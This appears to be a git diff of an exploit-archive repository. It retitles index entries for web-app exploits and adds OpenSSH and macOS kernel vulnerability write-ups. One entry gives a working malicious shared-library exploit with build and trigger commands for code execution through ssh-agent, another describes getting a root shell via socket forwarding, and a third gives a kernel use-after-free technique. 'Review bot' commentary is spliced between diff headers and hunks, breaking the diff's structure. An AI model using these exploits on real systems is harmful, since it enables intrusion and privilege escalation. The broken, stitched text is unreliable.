+6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion",2008-10-02,ZeN,php,webapps,0
+6655,platforms/php/webapps/6655.php,"OpenX 2.6 - 'bannerid' Parameter Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0
 6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
 6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
@@ -19979,7 +19981,7 @@ id,file,description,date,author,platform,type,port
 7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - (Authentication Bypass) SQL Injection",2008-11-14,R3d-D3V!L,asp,webapps,0
 7121,platforms/php/webapps/7121.pl,"SlimCMS 1.0.0 - 'edit.php' SQL Injection",2008-11-14,StAkeR,php,webapps,0
 7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal - Multiple SQL Injections",2008-11-14,InjEctOr5,php,webapps,0
-7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - (Authentication Bypass) SQL Injection",2008-11-14,ZoRLu,php,webapps,0
+7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - Authentication Bypass",2008-11-14,ZoRLu,php,webapps,0
 7124,platforms/php/webapps/7124.txt,"TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection",2008-11-14,ZoRLu,php,webapps,0
 7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - 'chid' Parameter SQL Injection",2008-11-15,snakespc,php,webapps,0
 7130,platforms/php/webapps/7130.php,"Minigal b13 - 'index.php list' Remote File Disclosure",2008-11-15,"Alfons Luja",php,webapps,0
@@ -21467,7 +21469,7 @@ id,file,description,date,author,platform,type,port
 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0
 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0
 9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
-9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
+9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0
 9460,platforms/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,php,webapps,0
@@ -22127,7 +22129,6 @@ id,file,description,date,author,platform,type,port
 10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
 10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
 10833,platforms/php/webapps/10833.txt,"Classifieds Script - (type) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
-10834,platforms/php/webapps/10834.txt,"Link Trader - (lnkid) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
 10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0
 10836,platforms/php/webapps/10836.txt,"Elkagroup - 'pid' SQL Injection",2009-12-30,"Hussin X",php,webapps,0
 10837,platforms/php/webapps/10837.txt,"Quick Poll - 'code.php id' SQL Injection",2009-12-31,"Hussin X",php,webapps,0
@@ -25043,7 +25044,7 @@ id,file,description,date,author,platform,type,port
 18032,platforms/windows/webapps/18032.rb,"SAP Management Console - OSExecute Payload Execution (Metasploit)",2011-10-24,Metasploit,windows,webapps,0
 18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,php,webapps,0
 18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 (build 11944) - Multiple Vulnerabilities",2011-10-27,EgiX,php,webapps,0
-18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection (Metasploit)",2011-10-26,Metasploit,php,webapps,0
+18037,platforms/php/webapps/18037.rb,"phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)",2011-10-26,Metasploit,php,webapps,0
 18039,platforms/php/webapps/18039.txt,"WordPress Plugin wptouch - SQL Injection",2011-10-27,longrifle0x,php,webapps,0
 18045,platforms/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0
 18047,platforms/php/webapps/18047.txt,"Joomla! Component 'com_jeemasms' 3.2 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
@@ -26842,7 +26843,7 @@ id,file,description,date,author,platform,type,port
 24238,platforms/php/webapps/24238.txt,"CuteNews 0.88/1.3 - 'example1.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0
 24239,platforms/php/webapps/24239.txt,"CuteNews 0.88/1.3 - 'example2.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0
 24240,platforms/php/webapps/24240.txt,"CuteNews 0.88/1.3 - 'show_archives.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0
-24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - modules.php Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0
+24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - 'modules.php' Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0
 24244,platforms/cgi/webapps/24244.txt,"Netegrity IdentityMinder Web Edition 5.6 - Null Byte Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps,0
 24245,platforms/cgi/webapps/24245.txt,"Netegrity IdentityMinder Web Edition 5.6 - Management Interface Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps,0
 24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-Spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0
@@ -27927,7 +27928,7 @@ id,file,description,date,author,platform,type,port
 26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0
 26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 - header.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0
 26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - footer.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0
-26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion",2005-07-25,lwdz,php,webapps,0
+26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - 'Apa_PHPInclude.INC.php' Remote File Inclusion",2005-07-25,lwdz,php,webapps,0
 26025,platforms/php/webapps/26025.txt,"Netquery 3.1 - submit.php portnum Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0
 26026,platforms/php/webapps/26026.txt,"Netquery 3.1 - nqgeoip2.php Multiple Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0
 26027,platforms/php/webapps/26027.txt,"Netquery 3.1 - nqgeoip.php step Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0
@@ -27940,10 +27941,10 @@ id,file,description,date,author,platform,type,port
 26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 - Demo.php Cross-Site Scripting",2005-07-26,ArCaX-ATH,php,webapps,0
 26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 - 'results.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
 26038,platforms/php/webapps/26038.txt,"Clever Copy 2.0 - 'categorysearch.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
-26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - topic.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
-26040,platforms/php/webapps/26040.txt,"BMForum 3.0 - forums.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
-26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - post.php forumid Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
-26042,platforms/php/webapps/26042.txt,"BMForum 3.0 - announcesys.php forumid Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
+26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - 'topic.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
+26040,platforms/php/webapps/26040.txt,"BMForum 3.0 - 'forums.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
+26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - 'post.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
+26042,platforms/php/webapps/26042.txt,"BMForum 3.0 - 'announcesys.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
 26043,platforms/php/webapps/26043.txt,"Clever Copy 2.0 - Private Message Unauthorized Access",2005-07-27,Lostmon,php,webapps,0
 26045,platforms/php/webapps/26045.txt,"phpList 2.8.12 - Admin Page SQL Injection",2005-07-28,tgo,php,webapps,0
 26046,platforms/cgi/webapps/26046.txt,"@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-28,Lostmon,cgi,webapps,0
@@ -28778,8 +28779,8 @@ id,file,description,date,author,platform,type,port
 27098,platforms/php/webapps/27098.txt,"RedKernel Referrer Tracker 1.1.0-3 - Rkrt_stats.php Cross-Site Scripting",2006-01-16,Preddy,php,webapps,0
 27099,platforms/php/webapps/27099.txt,"BlogPHP 1.0 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0
 27100,platforms/php/webapps/27100.txt,"microBlog 2.0 - 'index.php' Multiple SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
-27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
-27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - search.php search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
+27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
+27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
 27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
 27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php' 'Username' Field SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
 27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
@@ -31305,8 +31306,8 @@ id,file,description,date,author,platform,type,port
 30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 - modules.php SQL Injection",2007-11-12,0x90,php,webapps,0
 30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",php,webapps,0
 30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - PHP_SELF index.php Cross-Site Scripting",2007-08-27,L4teral,php,webapps,0
-30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - sources/frame.php room Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
-30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - upgradev1.php INSTALL_X7CHATVERSION Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
+30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
+30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
 30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - Searchtype Parameter Cross-Site Scripting",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0
 30762,platforms/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0
 30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0
@@ -31983,9 +31984,9 @@ id,file,description,date,author,platform,type,port
 31822,platforms/php/webapps/31822.txt,"PHPFreeForum 1.0 rc2 - part/menu.php Multiple Parameter Cross-Site Scripting",2008-05-22,tan_prathan,php,webapps,0
 31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 - cms/includes/header.inc.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
 31824,platforms/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 - cms/includes/login.inc.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
-31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' outpused Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
-31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - newtem/footer/bsd01footer.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
-31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - newtem/header/bsd01header.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
+31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
+31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
+31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - 'bsd01header.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
 31829,platforms/php/webapps/31829.txt,"AbleDating 2.4 - search_results.php keyword Parameter SQL Injection",2008-05-22,"Ali Jasbi",php,webapps,0
 31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 - search_results.php keyword Parameter Cross-Site Scripting",2008-05-22,"Ali Jasbi",php,webapps,0
 32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0
@@ -32724,9 +32725,9 @@ id,file,description,date,author,platform,type,port
 33115,platforms/php/webapps/33115.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' replid Parameter SQL Injection",2009-06-27,Moudi,php,webapps,0
 33116,platforms/php/webapps/33116.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' Multiple Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0
 33117,platforms/php/webapps/33117.txt,"AlmondSoft Classifieds Pro - gmap.php addr Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0
-33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - courses_login.php cat_id Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
-33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - news_read.php id Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
-33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - lessons_login.php Multiple Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
+33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
+33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - 'news_read.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
+33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
 33122,platforms/php/webapps/33122.txt,"Joomla! Component com_user - 'view' Parameter URI redirection",2009-06-27,"599eme Man",php,webapps,0
 33125,platforms/php/webapps/33125.txt,"Joomla! Component Permis 1.0 (com_groups) - 'id' Parameter SQL Injection",2009-06-28,Prince_Pwn3r,php,webapps,0
 33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting",2009-06-28,Moudi,php,webapps,0
@@ -35638,7 +35639,7 @@ id,file,description,date,author,platform,type,port
 37828,platforms/php/webapps/37828.txt,"Poweradmin - 'index.php' Cross-Site Scripting",2012-09-20,Siavash,php,webapps,0
 37829,platforms/php/webapps/37829.txt,"WordPress Plugin MF Gig Calendar - Cross-Site Scripting",2012-09-20,"Chris Cooper",php,webapps,0
 37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0
-37938,platforms/php/webapps/37938.txt,"OpenX - /www/admin/plugin-index.php parent Parameter Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps,0
+37938,platforms/php/webapps/37938.txt,"OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps,0
 37939,platforms/php/webapps/37939.txt,"FileContral - Local File Inclusion / Local File Disclosure",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0
 38066,platforms/php/webapps/38066.txt,"WordPress Plugin Video Lead Form - 'errMsg' Parameter Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0
 38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80
@@ -36915,3 +36916,4 @@ id,file,description,date,author,platform,type,port
 40940,platforms/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0
 40941,platforms/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps,0
 40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
+40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0
diff --git a/platforms/linux/local/40962.txt b/platforms/linux/local/40962.txt
new file mode 100755
index 000000000..81c8418f5
--- /dev/null
+++ b/platforms/linux/local/40962.txt
@@ -0,0 +1,26 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010
+
+This issue affects OpenSSH if privilege separation is disabled (config option
+UsePrivilegeSeparation=no). While privilege separation is enabled by default, it
+is documented as a hardening option, and therefore disabling it should not
+directly make a system vulnerable.
+
+OpenSSH can forward TCP sockets and UNIX domain sockets. If privilege separation
+is disabled, then on the server side, the forwarding is handled by a child of
+sshd that has root privileges. For TCP server sockets, sshd explicitly checks
+whether an attempt is made to bind to a low port (below IPPORT_RESERVED) and, if
+so, requires the client to authenticate as root. However, for UNIX domain
+sockets, no such security measures are implemented.
+
+This means that, using "ssh -L", an attacker who is permitted to log in as a
+normal user over SSH can effectively connect to non-abstract unix domain sockets
+with root privileges. On systems that run systemd, this can for example be
+exploited by asking systemd to add an LD_PRELOAD environment variable for all
+following daemon launches and then asking it to restart cron or so. The attached
+exploit demonstrates this - if it is executed on a system with systemd where
+the user is allowed to ssh to his own account and where privsep is disabled, it
+yields a root shell.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40962.zip
diff --git a/platforms/linux/remote/40963.txt b/platforms/linux/remote/40963.txt
new file mode 100755
index 000000000..826284eab
--- /dev/null
+++ b/platforms/linux/remote/40963.txt
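Review bot: The record gives neither a fixed version nor a one-line mitigation, so a reader of 40962.txt on its own is left with only the issue link; the sibling entry 40963.txt in this same diff closes with a `Fixed in ...` line and this file should match, e.g. `Fixed in: OpenSSH 7.4`. The text already states the operational mitigation in passing (privilege separation is on by default and only disabled as a deliberate choice), and restating that as `Mitigation: keep UsePrivilegeSeparation at its default` next to the Source line would make the entry usable for triage without reading the whole write-up. The hunk is complete at 26 added lines; nothing continues outside it.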
@@ -0,0 +1,33 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1009
+
+The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded.
+
+This means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine.
+
+To reproduce the issue, first create a library that executes some command when it is loaded:
+
+$ cat evil_lib.c
+#include
+__attribute__((constructor)) static void run(void) {
+ // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH,
+ // prevent recursion through system()
+ unsetenv("LD_PRELOAD");
+ unsetenv("LD_LIBRARY_PATH");
+ system("id > /tmp/test");
+}
+$ gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall
+
+Connect to another machine using "ssh -A". Then, on the remote machine:
+
+$ ssh-add -s [...]/evil_lib.so
+Enter passphrase for PKCS#11: [just press enter here]
+SSH_AGENT_FAILURE
+Could not add card: [...]/evil_lib.so
+
+At this point, the command "id > /tmp/test" has been executed on the machine running the ssh agent:
+
+$ cat /tmp/test
+uid=1000(user) gid=1000(user) groups=[...]
+
+
+Fixed in http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/ssh-agent.c.diff?r1=1.214&r2=1.215&f=h
\ No newline at end of file
diff --git a/platforms/multiple/dos/40955.txt b/platforms/multiple/dos/40955.txt
index 97bdd40fb..4dccba7d9 100755
--- a/platforms/multiple/dos/40955.txt
+++ b/platforms/multiple/dos/40955.txt
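Review bot: The `+#include` line in the evil_lib.c listing carries no header name, so the snippet as recorded no longer matches what the `gcc` line below it builds; the angle-bracketed name was most likely dropped as markup on import and should be restored from the referenced project-zero issue (`unsetenv()` and `system()` are declared in `<stdlib.h>`). The closing `Fixed in` line only points at a cvsweb revision diff; naming the release that shipped it, e.g. `Fixed in: OpenSSH 7.4 (ssh-agent.c r1.215)`, lets readers compare against their installed version without following the link. The write-up's precondition — agent forwarding to a server the user does not trust — is the mitigation side and is worth a short `Mitigation:` line of its own. The hunk is complete at 33 lines and the file has no trailing newline.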
@@ -1,16 +1,153 @@ -Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=930 +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=926 -IOUserClient subclasses which override IOUserClient::externalMethod need to ensure that if they return -kIOReturnSuccess they actually take ownership of the mach_port_t asyncWakePort if they are called via -IOConnectCallAsyncMethod. +mach ports are really struct ipc_port_t's in the kernel; this is a reference-counted object, +ip_reference and ip_release atomically increment and decrement the 32 bit io_references field. -If the userclient code doesn't take ownership of the mach port and returns a success code MIG assumes that -they did take ownership and won't release it's reference on the port. This leads to a reference count leak. +Unlike OSObjects, ip_reference will allow the reference count to overflow, however it is still 32-bits +so without either a lot of physical memory (which you don't have on mobile or most desktops) or a real reference leak +this isn't that interesting. -See the previous bug for more in-depth discussion. +** MIG and mach message rights ownership ** -This PoC targets IOSurface which was just the first userclient I looked at; I imagine more are vulnerable. -This PoC takes about an hour on 4 core MacBookPro to trigger the kernel UaF. +ipc_kobject_server in ipc_kobject.c is the main dispatch routine for the kernel MIG endpoints. When userspace sends a +message the kernel will copy in the message body and also copy in all the message rights; see for example +ipc_right_copyin in ipc_right.c. This means that by the time we reach the actual callout to the MIG handler any port rights +contained in a request have had their reference count increased by one. + +After the callout we reach the following code (still in ipc_kobject_server): + + if ((kr == KERN_SUCCESS) || (kr == MIG_NO_REPLY)) { + // The server function is responsible for the contents + // of the message. 
The reply port right is moved + // to the reply message, and we have deallocated + // the destination port right, so we just need + // to free the kmsg. + ipc_kmsg_free(request); + } else { + // The message contents of the request are intact. + // Destroy everthing except the reply port right, + // which is needed in the reply message. + request->ikm_header->msgh_local_port = MACH_PORT_NULL; + ipc_kmsg_destroy(request); + } + +If the MIG callout returns success, then it means that the method took ownership of *all* of the rights contained in the message. +If the MIG callout returns a failure code then the means the method took ownership of *none* of the rights contained in the message. + +ipc_kmsg_free will only destroy the message header, so if the message had any other port rights then their reference counts won't be +decremented. ipc_kmsg_destroy on the other hand will decrement the reference counts for all the port rights in the message, even those +in port descriptors. + +If we can find a MIG method which returns KERN_SUCCESS but doesn't in fact take ownership of any mach ports its passed (by for example +storing them and dropping the ref later, or using them then immediately dropping the ref or passing them to another method which takes +ownership) then this can lead to us being able to leak references. 
+ +** indirect MIG methods ** + +Here's the MIG request structure generated for io_service_add_notification_ool_64: + + typedef struct { + mach_msg_header_t Head; + // start of the kernel processed data + mach_msg_body_t msgh_body; + mach_msg_ool_descriptor_t matching; + mach_msg_port_descriptor_t wake_port; + // end of the kernel processed data + NDR_record_t NDR; + mach_msg_type_number_t notification_typeOffset; // MiG doesn't use it + mach_msg_type_number_t notification_typeCnt; + char notification_type[128]; + mach_msg_type_number_t matchingCnt; + mach_msg_type_number_t referenceCnt; + io_user_reference_t reference[8]; + mach_msg_trailer_t trailer; + } Request __attribute__((unused)); + + +This is an interesting method as its implementation actually calls another MIG handler: + + + static kern_return_t internal_io_service_add_notification_ool( + ... + kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t) matching ); + data = CAST_DOWN(vm_offset_t, map_data); + + if( KERN_SUCCESS == kr) { + // must return success after vm_map_copyout() succeeds + // and mig will copy out objects on success + *notification = 0; + *result = internal_io_service_add_notification( master_port, notification_type, + (char *) data, matchingCnt, wake_port, reference, referenceSize, client64, notification ); + vm_deallocate( kernel_map, data, matchingCnt ); + } + + return( kr ); + } + + +and internal_io_service_add_notification does this: + + + static kern_return_t internal_io_service_add_notification( + ... + if( master_port != master_device_port) + return( kIOReturnNotPrivileged); + + do { + err = kIOReturnNoResources; + + if( !(sym = OSSymbol::withCString( notification_type ))) + err = kIOReturnNoResources; + + if (matching_size) + { + dict = OSDynamicCast(OSDictionary, OSUnserializeXML(matching, matching_size)); + } + else + { + dict = OSDynamicCast(OSDictionary, OSUnserializeXML(matching)); + } + + if (!dict) { + err = kIOReturnBadArgument; + continue; + } + ... 
+ } while( false ); + + return( err ); + + +This inner function has many failure cases (wrong kernel port, invalid serialized data) which we can easily trigger and these error paths lead +to this inner function not taking ownership of the wake_port argument. However, MIG will only see the return value of the outer internal_io_service_add_notification_ool +which will always return success if we pass a valid ool memory descriptor. This violates ipc_kobject_server's ownership model where success means ownership +was taken of all rights, not just some. + +What this leads to is actually quite a nice primitive for constructing an ipc_port_t reference count overflow without leaking any memory. + +If we call io_service_add_notification_ool with a valid ool descriptor, but fill it with data that causes OSUnserializeXML to return an error then +we can get that memory freed (via the vm_deallocate call above) but the reference on the wake port will be leaked since ipc_kmsg_free will be called, not +ipc_kmsg_destroy. + +If we send this request 0xffffffff times we can cause a ipc_port_t's io_references field to overflow to 0; the next time it's used the ref will go 0 -> 1 -> 0 +and the object will be free'd but we'll still have a dangling pointer in our process's ports table. + +As well as being a regular kernel UaF this also gives us the opportunity to do all kinds of fun mach port related logic attacks, eg getting send rights to +other task's task ports via our dangling ipc_port_t pointer. + +** practicality ** + +On my 4 year old dual core MBA 5,2 running with two threads this PoC takes around 8 hours after which you should see a kernel panic indicative of a UaF. +Note that there are no resources leaks involved here so you can run it even on very constrained systems like an iPhone and it will work fine, +albeit a bit slowly :) + +This code is reachable from all sandboxed environments. 
+ +** fixes ** + +One approach to fixing this issue would be to do something similar to OSObjects which use a saturating reference count and leak the object if the reference count saturates + +I fear there are a great number of similar issues so just fixing this once instance may not be enough. Proof of Concept: diff --git a/platforms/multiple/webapps/40961.py b/platforms/multiple/webapps/40961.py new file mode 100755 index 000000000..496ebc502 --- /dev/null +++ b/platforms/multiple/webapps/40961.py 
